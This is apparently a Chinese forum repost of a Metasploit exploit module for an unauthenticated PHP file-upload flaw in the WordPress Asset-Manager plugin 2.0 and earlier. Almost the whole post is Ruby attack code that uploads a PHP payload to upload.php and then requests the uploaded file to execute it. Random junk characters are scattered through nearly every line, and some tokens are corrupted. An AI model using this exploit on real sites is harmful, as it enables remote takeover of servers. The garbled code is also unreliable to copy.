这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。; w6 [; F0 o8 }# H
0 y5 @6 U0 l! D& f8 W: E
##
, ?' E, @, S4 x: |# m2 h1 m$ ~# This file is part of the Metasploit Framework and may be subject to2 A# R3 Q* |8 X! q' Q
# redistribution and commercial restrictions. Please see the Metasploit+ t( _9 u# k. c$ m9 k' J
# Framework web site for more information on licensing and terms of use.4 r% I' Y1 p1 c( k
# http://metasploit.com/framework/
* a4 K. M& C! A* _. V6 ~##
1 \$ W; D6 w9 t5 ?, u % m& S, [5 ^0 N! @: \# x W
require 'msf/core'
1 ?. x; G9 G9 Erequire 'msf/core/exploit/php_exe'/ O1 R+ q _9 F9 r: }
5 {( D( H# P7 t% F1 w+ S8 iclass Metasploit3 < Msf::Exploit::Remote
" Q. Q7 \& _) H2 y Rank = ExcellentRanking6 y3 a4 r5 P+ b) P A$ _1 O1 B* Z
% r/ r( g! ?/ X3 b$ U( H1 B
include Msf::Exploit::Remote::HttpClient
- D" B3 ]( w" k* p/ {* t* b include Msf::Exploit: hpEXE
, g+ J5 q7 N, C+ F# A" w* z ! a3 d# I! [# C1 m" l% P7 A4 p
def initialize(info = {})+ N) L; }$ G' m; S& G( y7 v" E
super(update_info(info,
6 N/ y4 \1 r1 ]! t; ~( W8 ?3 E4 M 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
) {$ w% T! z! k- j8 ^, ^6 u 'Description' => %q{
: J5 c' z' D8 i, c: \* u This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress; X% j- C% {9 Z' i! b
plugin. By abusing the upload.php file, a malicious user can upload a file to a# n2 E0 t$ l( ~" F0 \/ j3 c
temp directory without authentication, which results in arbitrary code execution.9 k6 A; t: g. R
},
# B% s8 ~7 a: R+ k0 b" k: I9 M" |- B* Q 'Author' =>
7 R0 P& d; v) j7 U6 m. @+ q$ S" g [
i. C) |* L$ L6 J 'Sammy FORGIT', # initial discovery6 d8 }- m% b# E: G4 ~6 [
'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ h* v! V) N/ ^9 X/ T; n5 Z, l5 c
],
: X& s. |) {& U 'License' => MSF_LICENSE,
1 h# T) f+ K: k( M 'References' =>
6 ?/ p2 R# E" |2 Y% ]/ }# R* I [0 f) x, f' `! d+ i/ E/ I
[ 'OSVDB', '82653' ],
7 B- F" W# y1 e8 X2 z/ e, q. m" l, F [ 'BID', '53809' ],
( D1 P- C3 W- g. S. ?( f [ 'EDB', '18993' ],6 x# J V' Q, @' b
[ 'URL', 'http:// www.myhack58.com /' ]
1 Y3 O1 Y3 c0 R; S ],
! V% Y& M1 s+ F; [2 Q( V 'Payload' =>
. D: Y+ y& E0 [& c {7 Q( ~9 E; U+ F
'BadChars' => "\x00", c$ ]+ R& q% ], T( s
},
- u4 Z+ X# Z, U+ L7 c8 b 'Platform' => 'php',% l3 f( u, o6 A. F
'Arch' => ARCH_PHP,
# H! {$ k$ ~9 v0 W" l 'Targets' =>9 X4 y+ T- ^2 H. ~8 V
[5 @6 @+ B) c: J+ n# c6 r
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
6 N3 j3 t; K. g$ r) G: S; a [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 B" n5 [, M5 X* W ^& t
],3 ?: n& _1 o4 t7 p% ]" b
'DefaultTarget' => 0,
8 b* s) b: O4 I 'DisclosureDate' => 'May 26 2012'))
1 m/ Q, D# D, O7 W8 S8 j$ P . U9 \/ R* [+ e
register_options(8 o9 Z8 | I U
[9 ^& S! v- `; f' o5 G" p0 m. g" s2 F
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
- Y6 G9 G0 ~* x* X. V: z ], self.class)
0 q$ l/ l1 E& ^' E; V end5 S) L' v C" n/ k* X7 s k
# P' O( @9 X5 u3 n% U0 w8 X def exploit0 B9 g7 L8 a& V! v! i
uri = target_uri.path r3 a1 U0 r8 ^2 h9 ^
uri << '/' if uri[-1,1] != '/'
( Y. O6 r+ F+ j" Z( h1 Z/ U peer = "#{rhost}:#{rport}"
9 q) W' N. F6 W/ G) V+ I/ V payload_name = "#{rand_text_alpha(5)}.php"$ x* \- ?! k" Y1 p0 ~7 m! J
php_payload = get_write_exec_payload(:unlink_self=>true)$ z) h5 B" b5 ], I+ g) W& d6 A- p [& O
5 M/ p R& k8 q; ]% Y. q
data = Rex::MIME::Message.new
& K/ h" n8 ? O1 x# ~; c data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
( O: _# F" _" m5 d5 j# ?+ Y post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
: U1 w1 x, @3 a: R& a/ R ( b3 l2 w d! K7 ]& y
print_status("#{peer} - Uploading payload #{payload_name}")7 X+ l+ Y2 Q1 V. A" C h2 U9 j
res = send_request_cgi({
$ S% T8 N) R9 E& }9 R 'method' => 'POST',
* U' X9 m5 ~7 A- }) z$ c 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
' a! E, |3 K/ O2 q 'ctype' => "multipart/form-data; boundary=#{data.bound}",8 h h' m7 v, o6 o# C
'data' => post_data
8 |3 u- e# D* g4 X1 Z })
& a5 M' d6 g8 h$ ^- H+ b * a2 c5 x: W8 @$ x+ @0 y
if not res or res.code != 200 or res.body !~ /#{payload_name}/$ m8 |- g5 b! H g6 s( S
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
4 ^4 Z7 U O) [2 d Y8 |end
' Z1 K5 V- Z0 m" P& }
: O' ? r4 v9 r/ C print_status("#{peer} - Executing payload #{payload_name}")5 Q3 N' z% B: [& U- t" h
res = send_request_raw({
& Z" t2 n1 ~& y 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
! K5 U5 U% O9 h5 W 'method' => 'GET'
' t5 g% v- r8 Z+ ?2 `" @: c })/ f, b% M! J) `* G$ ?/ u3 e, o4 `
3 V# \- `0 ^/ `6 E7 d
if res and res.code != 2007 E' _. R7 }: i. {( u" f
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")! e/ l+ H$ | y9 V/ ]7 r& \
end b& v7 @0 v- I- {7 n, J
end
: k6 Z- C5 `5 f, R9 Oend* w, x$ I1 U4 X6 l; ?
|
发表于 2012-12-31 09:22:33
收藏
支持
反对